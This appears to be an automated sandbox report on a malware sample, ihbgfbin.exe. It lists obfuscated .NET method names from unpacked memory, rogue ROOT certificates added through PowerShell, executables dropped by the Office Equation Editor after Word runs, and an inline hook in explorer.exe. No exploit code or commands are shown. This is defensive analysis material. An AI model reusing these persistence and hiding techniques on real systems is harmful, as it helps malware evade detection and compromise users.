      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, tA7i8nJpHHjPLZFuxc.csHigh entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, GUfLMezVVBW6DFoN6c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Su1oSotSjI2spxQEP1.csHigh entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, XWDdYZHHnPlrZu8iea.csHigh entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, LUlxKFsPGecqmhiLmG.csHigh entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, JqoaEHn6fskh1axBN5.csHigh entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, l6vWB1e3QQcGjD0U0Q.csHigh entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, YkqmWPwHXT1Dof8HBx.csHigh entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.csHigh entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, RAPiKAbihyERmIJCsAy.csHigh entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, zk9ouufXnNX6cgGtFt.csHigh entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, VKswYFpqvvXi8LFXCK.csHigh entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, ct6qfC6iAWScj7P1qt.csHigh entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, lTEVKZLOPxSw8XSL4K.csHigh entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, GIOroEDHEHdCvcU7Zj.csHigh entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, fDAJsxI6uXNBMy6W6j.csHigh entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.csHigh entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, x4VJgm7ynwtCPvJCyj.csHigh entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, EwFFCXjNncBSPwukAV.csHigh entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, tA7i8nJpHHjPLZFuxc.csHigh entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, GUfLMezVVBW6DFoN6c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Su1oSotSjI2spxQEP1.csHigh entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, XWDdYZHHnPlrZu8iea.csHigh entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, LUlxKFsPGecqmhiLmG.csHigh entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, JqoaEHn6fskh1axBN5.csHigh entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, l6vWB1e3QQcGjD0U0Q.csHigh entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, YkqmWPwHXT1Dof8HBx.csHigh entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.csHigh entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, RAPiKAbihyERmIJCsAy.csHigh entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, zk9ouufXnNX6cgGtFt.csHigh entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, VKswYFpqvvXi8LFXCK.csHigh entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, ct6qfC6iAWScj7P1qt.csHigh entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, lTEVKZLOPxSw8XSL4K.csHigh entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, GIOroEDHEHdCvcU7Zj.csHigh entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, fDAJsxI6uXNBMy6W6j.csHigh entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.csHigh entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, x4VJgm7ynwtCPvJCyj.csHigh entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, EwFFCXjNncBSPwukAV.csHigh entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, tA7i8nJpHHjPLZFuxc.csHigh entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, GUfLMezVVBW6DFoN6c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Su1oSotSjI2spxQEP1.csHigh entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, XWDdYZHHnPlrZu8iea.csHigh entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, LUlxKFsPGecqmhiLmG.csHigh entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, JqoaEHn6fskh1axBN5.csHigh entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'

      Persistence and Installation Behavior

      barindex
      Installs new ROOT certificates
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ihbgfbin.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009188BF IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow,10_2_009188BF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00918810 IsIconic,GetWindowPlacement,GetLastError,10_2_00918810
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091C869 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,GetCursorPos,GetTitleBarInfo,SetCursorPos,SendMessageW,10_2_0091C869
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009199FA DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,CheckMenuItem,DefWindowProcW,10_2_009199FA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091C134 IsWindowVisible,IsIconic,10_2_0091C134
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00950BF5 GetWindowRect,GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos,10_2_00950BF5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091B319 LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,ShowWindow,SetWindowPos,SetWindowPos,SetWindowPos,LockWindowUpdate,10_2_0091B319
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091A341 IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,10_2_0091A341
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091BCCB GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,AdjustWindowRectEx,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement,10_2_0091BCCB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00916416 IsIconic,GetWindowPlacement,GetWindowRect,10_2_00916416
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
